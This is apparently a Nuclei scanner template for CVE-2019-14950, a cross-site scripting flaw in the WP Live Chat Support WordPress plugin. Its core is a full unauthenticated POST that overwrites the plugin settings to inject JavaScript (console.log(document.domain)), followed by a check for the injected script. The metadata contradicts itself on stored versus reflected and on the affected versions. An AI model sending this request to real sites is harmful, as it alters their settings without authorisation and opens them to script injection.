wp-live-chat-support plugin before 8.0.27 for WordPress contains a reflected cross-site scripting vulnerability caused by insufficient sanitization in the GDPR page, letting attackers execute arbitrary scripts in the context of the victim's browser; exploitation requires the victim to visit a malicious page.
PoC code [publicly available]
id: CVE-2019-14950

info:
  name: WP Live Chat Support <= 8.0.27 — Stored Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: |
    wp-live-chat-support plugin before 8.0.27 for WordPress contains a reflected cross-site scripting vulnerability caused by insufficient sanitization in the GDPR page, letting attackers execute arbitrary scripts in the context of the victim's browser; exploitation requires the victim to visit a malicious page.
  impact: |
    Attackers can execute arbitrary scripts in the victim's browser, potentially leading to session hijacking or defacement.
  remediation: |
    Update to version 8.0.27 or later.
  reference:
    - https://wordpress.org/plugins/wp-live-chat-support/#developers
    - https://blog.sucuri.net/2019/05/persistent-cross-site-scripting-in-wp-live-chat-support-plugin.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-14950
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-14950
    cwe-id: CWE-79
    epss-score: 0.05959
    epss-percentile: 0.90304
    cpe: cpe:2.3:a:3cx:live_chat:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: 3cx
    product: live_chat
    framework: wordpress
    publicwww-query: "/wp-content/plugins/wp-live-chat-support"
  tags: cve,cve2019,wordpress,wp,wp-plugin,wp-live-chat-support,xss,intrusive,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-admin/admin-post.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        wplc_settings_enabled=1&wplc_require_user_info=1&wplc_user_default_visitor_name=Guest&wplc_user_alternative_text=Please+click+%27Start+Chat%27+to+initiate+a+chat+with+an+agent&wplc_loggedin_user_info=1&wplc_enabled_on_mobile=1&wplc_enable_msg_sound=1&wplc_enable_font_awesome=1&wplc_elem_trigger_action=0&wplc_elem_trigger_type=0&wplc_elem_trigger_id=&wplc_environment=1&wplc_iterations=55&wplc_delay_between_loops=500000&wplc_enable_transcripts=1&wplc_send_transcripts_to=user&wplc_et_email_body=%3C%21DOCTYPE+HTML+PUBLIC+%22-%2F%2FW3C%2F%2FDTD+HTML+4.01+Transitional%2F%2FEN%22+%22http%3A%2F%2Fwww.w3.org%2FTR%2Fhtml4%2Floose.dtd%22%3E%09%09%0D%0A%09%3Chtml%3E%0D%0A%09%0D%0A%09%3Cbody%3E%0D%0A%0D%0A%0D%0A%0D%0A%09%09%3Ctable+id%3D%22%22+border%3D%220%22+cellpadding%3D%220%22+cellspacing%3D%220%22+width%3D%22100%25%22+style%3D%22background-color%3A+%23ec822c%3B%22%3E%0D%0A%09++++%3Ctbody%3E%0D%0A%09++++++%3Ctr%3E%0D%0A%09++++++++%3Ctd+width%3D%22100%25%22+style%3D%22padding%3A+30px+20px+100px+20px%3B%22%3E%0D%0A%09++++++++++%3Ctable+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A600px%3B%22%3E%0D%0A%09++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+style%3D%22text-align%3A+center%3B+padding-bottom%3A+20px%3B%22%3E%0D%0A%09++++++++++++++++++%0D%0A%09++++++++++++++++++%3Cp%3E%5Bwplc_et_transcript_header_text%5D%3C%2Fp%3E%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%0D%0A%09++++++++++%3Ctable+id%3D%22%22+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A+600px%3B+font-family%3A+Georgia%2C+serif%3B+font-size%3A+12px%3B+color%3A+rgb%2851%2C+62%2C+72%29%3B+border%3A+0px+solid+rgb%28255%2C+255%2C+255%29%3B+border-radius%3A+10px%3B+background-color%3A+rgb%28255%2C+255%2C+255%29%3B%22%3E%0D%0A%09++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+class%3D%22sortable-list+ui-sortable%22+style%3D%22padding%3A20px%3B%22%3E%0D%0A%09++++++++++++++++++++%5Bwplc_et_transcript%5D%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%0D%0A%09++++++++++%3Ctable+align%3D%22center%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22+style%3D%22border-collapse%3A+separate%3B+max-width%3A100%25%3B%22%3E%0D%0A%09++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++%3Ctd+style%3D%22padding%3A20px%3B%22%3E%0D%0A%09++++++++++++++++++%3Ctable+border%3D%220%22+cellpadding%3D%220%22+cellspacing%3D%220%22+class%3D%22%22+width%3D%22100%25%22%3E%0D%0A%09++++++++++++++++++++%3Ctbody%3E%0D%0A%09++++++++++++++++++++++%3Ctr%3E%0D%0A%09++++++++++++++++++++++++%3Ctd+id%3D%22%22+align%3D%22center%22%3E%0D%0A%09+++++++++++++++++++++++++%3Cp%3E%5Bwplc_et_transcript_footer_text%5D%3C%2Fp%3E%0D%0A%09++++++++++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++++++++++%3C%2Ftable%3E%0D%0A%09++++++++++++++++%3C%2Ftd%3E%0D%0A%09++++++++++++++%3C%2Ftr%3E%0D%0A%09++++++++++++%3C%2Ftbody%3E%0D%0A%09++++++++++%3C%2Ftable%3E%0D%0A%09++++++++%3C%2Ftd%3E%0D%0A%09++++++%3C%2Ftr%3E%0D%0A%09++++%3C%2Ftbody%3E%0D%0A%09++%3C%2Ftable%3E%0D%0A%0D%0A%0D%0A%09%09%0D%0A%09%09%3C%2Fdiv%3E%0D%0A%09%3C%2Fbody%3E%0D%0A%3C%2Fhtml%3E%0D%0A%09%09%09++&wplc_et_email_header=%3Ca+title%3D%22daffainfo%22+href%3D%22http%3A%2F%2Flocalhost%22+style%3D%22font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+bold%3B+text-decoration%3A+underline%3B%22%3Edaffainfo%3C%2Fa%3E++&wplc_et_email_footer=%3Cspan+style%3D%27font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+normal%3B%27%3EThank+you+for+chatting+with+us.+If+you+have+any+questions%2C+please+%3Ca+href%3D%22mailto%3Adaffainfo%40m.com%22+target%3D%22_blank%22+style%3D%22font-family%3A+Arial%2C+Helvetica%2C+sans-serif%3B+font-size%3A+13px%3B+color%3A+%23FFF%3B+font-weight%3A+bold%3B+text-decoration%3A+underline%3B%22%3Econtact+us%3C%2Fa%3E%3C%2Fspan%3E++&wplc_settings_align=2&wplc_redirect_thank_you_url=&wplc_preferred_gif_provider=1&wplc_giphy_api_key=&wplc_tenor_api_key=&wplc_pro_na=Chat+offline.+Leave+a+message&wplc_pro_offline1=We+are+currently+offline.+Please+leave+a+message+and+we%27ll+get+back+to+you+shortly.&wplc_pro_offline2=Sending+message...&wplc_pro_offline3=Thank+you+for+your+message.+We+will+be+in+contact+soon.&wplc_pro_offline_btn=Leave+a+message&wplc_pro_offline_btn_send=Send+message&wplc_pro_chat_email_address=daffainfo%40m.com&wplc_pro_chat_email_offline_subject=&wplc_mail_type=wp_mail&wplc_mail_host=&wplc_mail_port=&wplc_mail_username=daffainfo&wplc_mail_password=daffainfo&wplc_newtheme=theme-2&wplc_theme=theme-default&wplc_settings_bg=cloudy.jpg&wplc_settings_color1=ED832F&wplc_settings_color2=FFFFFF&wplc_settings_color3=EEEEEE&wplc_settings_color4=666666&wplc_pro_fst1=Questions%3F&wplc_pro_fst2=Chat+with+us&wplc_pro_intro=Hello.+Please+input+your+details+so+that+I+may+help+you.&wplc_pro_sst1=Start+Chat&wplc_pro_sst2=Connecting.+Please+be+patient...&wplc_pro_tst1=Reactivating+your+previous+chat...&wplc_welcome_msg=Please+standby+for+an+agent.+While+you+wait+for+the+agent+you+may+type+your+message.&wplc_user_no_answer=There+is+No+Answer.+Please+Try+Again+Later.&wplc_user_enter=Press+ENTER+to+send+your+message&wplc_text_chat_ended=The+chat+has+been+ended+by+the+operator.&wplc_agent_select=&wplc_ban_users_ip=&survey_display=1&wplc_pro_sst1_survey=Or+chat+to+an+agent+now&wplc_pro_sst1e_survey=Chat+ended&wplc_use_node_server=1&wplc_server_location=auto&wplc_node_token_input=9babb8867252d7cbcda4404d5e56239a&wplc_end_point_override=&wplc_new_chat_ringer_count=5&wplc_gdpr_notice_company=daffainfo&wplc_gdpr_notice_retention_purpose=Chat%2FSupport&wplc_gdpr_notice_retention_period=30&wplc_custom_css=&wplc_custom_js=console.log(document.domain)&activate_block=on&wplc_gutenberg_size=2&wplc_gutenberg_logo=https%3A%2F%2Fbleeper.io%2Fapp%2Fassets%2Fimages%2Fwplc_loading.png&wplc_gutenberg_text=Live+Chat&wplc_gutenberg_enable_icon=on&wplc_gutenberg_icon=fa-commenting-o&wplc_custom_html=%09%09++++++++++++%09%3C%21--+Default+HTML+--%3E%0D%0A%3Cdiv+class%3D%22wplc_block%22%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_logo%22%3E%7Bwplc_logo%7D%3C%2Fspan%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_text%22%3E%7Bwplc_text%7D%3C%2Fspan%3E%0D%0A%09%3Cspan+class%3D%22wplc_block_icon%22%3E%7Bwplc_icon%7D%3C%2Fspan%3E%0D%0A%3C%2Fdiv%3E%09%09++++++++++++&wplc_save_settings=Save+Settings

    matchers:
      - type: dsl
        dsl:
          - 'len(body) == 0'
          - 'status_code == 200'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "wp-live-chat-support", "<script>console.log(document.domain)</script>")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100deaabd5cabff1edde6d7a0c3b801eb15c4cc18d7b24017ae1dd50ebfe3308ac102200e39b74405e98c5f4a70cc3f91471c5b783fdecb3ce4baf631cb77bb7706ce61:922c64590222798bb761d5b6d8e72950